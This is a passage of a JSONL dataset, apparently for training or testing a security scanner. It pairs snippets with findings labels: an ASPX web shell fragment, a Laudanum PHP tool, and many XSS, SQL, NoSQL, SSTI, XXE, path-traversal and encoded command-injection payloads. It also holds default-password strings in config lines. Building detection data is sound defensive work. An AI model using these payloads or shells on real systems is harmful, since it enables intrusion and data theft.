webshell</title>\n</HEAD>\n<body >\n<form id=\"cmd\" method=\"post\" runat=\"server\">\n<asp:TextBox id=\"txtArg\" style=\"Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px\" runat=\"server\" Width=\"250px\"></asp:TextBox>\n<asp:Button id=\"testing\" style=\"Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px\" runat=\"server\" Text=\"excute\" OnClick=\"cmdExe_Click\"></asp:Button>\n<asp:Label id=\"lblText\" style=\"Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px\" runat=\"server\">Command:</asp:Label>\n</form>\n</body>\n</HTML>\n\n<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->\n<!-- http://michaeldaw.org 04/2007 -->\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "aspx", "filename": "cmd.aspx"}}]} {"id": "seclists_00257", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf <HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>", "injection_type": "cmd"}}]} {"id": "seclists_00258", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin') or '1'='1'-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin') or '1'='1'--", "injection_type": "SQL"}}]} {"id": "seclists_00259", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:FrontRange Solutions,master,access,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "FrontRange Solutions,master,access,"}}]} {"id": "seclists_00260", "source": "seclists", "source_license": "MIT", "text": "filename=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27", "injection_type": "cmd"}}]} {"id": "seclists_00261", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '(sqlattempt2)';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "(sqlattempt2)", "injection_type": "SQL"}}]} {"id": "seclists_00262", "source": "seclists", "source_license": "MIT", "text": "filename=%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A", "injection_type": "cmd"}}]} {"id": "seclists_00263", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = '%20or%20''='", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%20or%20''='", "injection_type": "SQL"}}]} {"id": "seclists_00264", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: <A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>", "injection_type": "XSS"}}]} {"id": "seclists_00265", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Oracle,FROSTY,SNOWMAN,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,FROSTY,SNOWMAN,"}}]} {"id": "seclists_00266", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<ins onmouseup=\"alert(1)\">test</ins> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<ins onmouseup=\"alert(1)\">test</ins>", "injection_type": "XSS"}}]} {"id": "seclists_00267", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Atlassian,Crowd,password,http://www.commandfive.com/papers/C5_TA_2013_3925_AtlassianCrowd.pdf@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Atlassian,Crowd,password,http://www.commandfive.com/papers/C5_TA_2013_3925_AtlassianCrowd.pdf"}}]} {"id": "seclists_00268", "source": "seclists", "source_license": "MIT", "text": "filename=<IMG SRC=javascript:alert('XSS')>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=javascript:alert('XSS')>", "injection_type": "cmd"}}]} {"id": "seclists_00269", "source": "seclists", "source_license": "MIT", "text": "filename=&#X000003c;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X000003c;", "injection_type": "cmd"}}]} {"id": "seclists_00270", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<keygen autofocus onfocus=alert(1)>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<keygen autofocus onfocus=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_00271", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"http_ua_os\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"http_ua_os\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00272", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><command onmouseenter=\"alert(1)\">test</command></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<command onmouseenter=\"alert(1)\">test</command>", "injection_type": "XSS"}}]} {"id": "seclists_00273", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><rp onmouseleave=\"alert(1)\">test</rp></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rp onmouseleave=\"alert(1)\">test</rp>", "injection_type": "XSS"}}]} {"id": "seclists_00274", "source": "seclists", "source_license": "MIT", "text": "username=23 OR 1=1&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "23 OR 1=1", "injection_type": "SQL"}}]} {"id": "seclists_00275", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=%28 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%28", "injection_type": "SQL"}}]} {"id": "seclists_00276", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: ha.ckers.org</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_00277", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<basefont onmouseup=\"alert(1)\">test</basefont> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<basefont onmouseup=\"alert(1)\">test</basefont>", "injection_type": "XSS"}}]} {"id": "seclists_00278", "source": "seclists", "source_license": "MIT", "text": "password: moore\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "moore"}}]} {"id": "seclists_00279", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_00280", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"*/alert(1)\">'onload=\"/*<svg/1='\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*/alert(1)\">'onload=\"/*<svg/1='", "injection_type": "XSS"}}]} {"id": "seclists_00281", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Digital Equipment,<BLANK>,komprie,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Digital Equipment,<BLANK>,komprie,"}}]} {"id": "seclists_00282", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &#00060;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#00060;", "injection_type": "cmd"}}]} {"id": "seclists_00283", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %3Becho%20DNATLQ$((29%2B55))$(echo%20DNATLQ)DNATLQ%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Becho%20DNATLQ$((29%2B55))$(echo%20DNATLQ)DNATLQ%26", "injection_type": "cmd"}}]} {"id": "seclists_00284", "source": "seclists", "source_license": "MIT", "text": "filename=&#X03C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X03C", "injection_type": "cmd"}}]} {"id": "seclists_00285", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00", "injection_type": "cmd"}}]} {"id": "seclists_00286", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%3Becho$IFSFGMEVK$((82%2B64))$(echo$IFSFGMEVK)FGMEVK\" HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Becho$IFSFGMEVK$((82%2B64))$(echo$IFSFGMEVK)FGMEVK\"", "injection_type": "cmd"}}]} {"id": "seclists_00287", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><shadow draggable=\"true\" ondragleave=\"alert(1)\">test</shadow></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<shadow draggable=\"true\" ondragleave=\"alert(1)\">test</shadow>", "injection_type": "XSS"}}]} {"id": "seclists_00288", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%2527%3B%20str%3D%24%28echo%20AUJGTN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%3B%20str%3D%24%28echo%20AUJGTN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_00289", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Zyxel,<N/A>,admin,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Zyxel,<N/A>,admin,"}}]} {"id": "seclists_00290", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=or%201=1 -- HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or%201=1 --", "injection_type": "cmd"}}]} {"id": "seclists_00291", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: Backslash-obfuscated XBL injection - variant 5</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Backslash-obfuscated XBL injection - variant 5", "injection_type": "XSS"}}]} {"id": "seclists_00292", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: `> <script>alert(5)</script> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: `> <script>alert(5)</script>", "injection_type": "XSS"}}]} {"id": "seclists_00293", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &#13;&#10;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#13;&#10;", "injection_type": "cmd"}}]} {"id": "seclists_00294", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: The vector incudes a binding file via injected style attrbute. Gecko only.</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: The vector incudes a binding file via injected style attrbute. Gecko only.", "injection_type": "XSS"}}]} {"id": "seclists_00295", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, evil tags, obfuscated, XML injection</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated, XML injection", "injection_type": "XSS"}}]} {"id": "seclists_00296", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=scully\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "scully"}}]} {"id": "seclists_00297", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, self contained</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, self contained", "injection_type": "XSS"}}]} {"id": "seclists_00298", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello globals()</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "globals()", "injection_type": "SSTI"}}]} {"id": "seclists_00299", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=\" or pg_sleep(__TIME__)-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or pg_sleep(__TIME__)--", "injection_type": "SQL"}}]} {"id": "seclists_00300", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><hgroup id=x tabindex=1 onfocus=alert(1)></hgroup></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<hgroup id=x tabindex=1 onfocus=alert(1)></hgroup>", "injection_type": "XSS"}}]} {"id": "seclists_00301", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<font ondblclick=\"alert(1)\">test</font> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<font ondblclick=\"alert(1)\">test</font>", "injection_type": "XSS"}}]} {"id": "seclists_00302", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 'something' = 'some'+'thing'';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 'something' = 'some'+'thing'", "injection_type": "SQL"}}]} {"id": "seclists_00303", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=cynthia\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "cynthia"}}]} {"id": "seclists_00304", "source": "seclists", "source_license": "MIT", "text": "filename=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CCUVUA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CCUVUA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26", "injection_type": "cmd"}}]} {"id": "seclists_00305", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><iframe id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></iframe> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><iframe id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></iframe>", "injection_type": "XSS"}}]} {"id": "seclists_00306", "source": "seclists", "source_license": "MIT", "text": "<?php\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net>\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file attempts to kill all netcat processes spawned by the current user.\n*** This may be useful in cases where a reverse shell attempt has gone wrong. \n***\n*** Written by Jason Gillam <jgillam@secureideas.com>\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n*** \n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n*** \n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\n\n// ***************** Config entries below ***********************\n\n// IPs are enterable as individual addresses TODO: add CIDR support\n$allowedIPs = array(\"19.168.2.16\", \"192.168.1.100\");\n\n# *********** No editable content below this line **************\n\n$allowed = 0;\nforeach ($allowedIPs as $IP) {\n if ($_SERVER[\"REMOTE_ADDR\"] == $IP)\n $allowed = 1;\n}\n\nif ($allowed == 0) {\n header(\"HTTP/1.0 404 Not Found\");\n die();\n}\n\n\n/* This error handler will turn all notices, warnings, and errors into fatal\n * errors, unless they have been suppressed with the @-operator. */\nfunction error_handler($errno, $errstr, $errfile, $errline, $errcontext) {\n /* The @-opertor (used with chdir() below) temporarely makes\n * error_reporting() return zero, and we don't want to die in that case.\n * We do note the error in the output, though. */\n if (error_reporting() == 0) {\n $_SESSION['output'] .= $errstr . \"\\n\";\n } else {\n die('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum PHP Hostname by IP Lookup</title>\n</head>\n<body>\n <h1>Fatal Error!</h1>\n <p><b>' . $errstr . '</b></p>\n <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>\n\n <hr>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\n Written by Tim Medin.<br/>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n\n</body>\n</html>');\n }\n}\n\nset_error_handler('error_handler');\n\n\n\n?>\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum Kill nc</title>\n <link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n</head>\n<body>\n\n<h1>Kill nc 0.1</h1>\n\n<?php echo exec('killall nc');?>\n <hr>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\n Written by Tim Medin.<br/>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n\n</body>\n</html>\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "killnc.php"}}]} {"id": "seclists_00307", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><button id=x tabindex=1 ondeactivate=alert(1)></button><input id=y autofocus></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<button id=x tabindex=1 ondeactivate=alert(1)></button><input id=y autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_00308", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=bulldog\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "bulldog"}}]} {"id": "seclists_00309", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id='; exec xp_regread HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'; exec xp_regread", "injection_type": "SQL"}}]} {"id": "seclists_00310", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><html ontouchmove=alert(1)></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<html ontouchmove=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_00311", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/issue\" >]><foo>&xxe;</foo>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/issue\" >]><foo>&xxe;</foo>", "injection_type": "XXE"}}]} {"id": "seclists_00312", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<title onpaste=\"alert(1)\" contenteditable>test</title> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<title onpaste=\"alert(1)\" contenteditable>test</title>", "injection_type": "XSS"}}]} {"id": "seclists_00313", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><map onmouseleave=\"alert(1)\">test</map></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<map onmouseleave=\"alert(1)\">test</map>", "injection_type": "XSS"}}]} {"id": "seclists_00314", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x", "injection_type": "XSS"}}]} {"id": "seclists_00315", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><acronym draggable=\"true\" ondragleave=\"alert(1)\">test</acronym></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<acronym draggable=\"true\" ondragleave=\"alert(1)\">test</acronym>", "injection_type": "XSS"}}]} {"id": "seclists_00316", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><style>@keyframes x{}</style><textarea style=\"animation-name:x\" onanimationstart=\"alert(1)\"></textarea></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><textarea style=\"animation-name:x\" onanimationstart=\"alert(1)\"></textarea>", "injection_type": "XSS"}}]} {"id": "seclists_00317", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: thespanner.co.uk\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: thespanner.co.uk", "injection_type": "XSS"}}]} {"id": "seclists_00318", "source": "seclists", "source_license": "MIT", "text": "password: aaaaaaaa\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "aaaaaaaa"}}]} {"id": "seclists_00319", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, evil tags, obfuscated, injection\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated, injection", "injection_type": "XSS"}}]} {"id": "seclists_00320", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '')%20or%20('x'='x';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "')%20or%20('x'='x", "injection_type": "SQL"}}]} {"id": "seclists_00321", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">", "injection_type": "XSS"}}]} {"id": "seclists_00322", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n$where: '1 == 1'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "$where: '1 == 1'", "injection_type": "NoSQL"}}]} {"id": "seclists_00323", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ${shell_exec(print(`echo%20VEKGIY%0aecho%20$((15%2B47))%0aecho%20VEKGIY%0aecho%20VEKGIY`)%3B.%252527VEKGIY", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${shell_exec(print(`echo%20VEKGIY%0aecho%20$((15%2B47))%0aecho%20VEKGIY%0aecho%20VEKGIY`)%3B.%252527VEKGIY", "injection_type": "cmd"}}]} {"id": "seclists_00324", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<tbody draggable=\"true\" ondragend=\"alert(1)\">test</tbody> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<tbody draggable=\"true\" ondragend=\"alert(1)\">test</tbody>", "injection_type": "XSS"}}]} {"id": "seclists_00325", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf 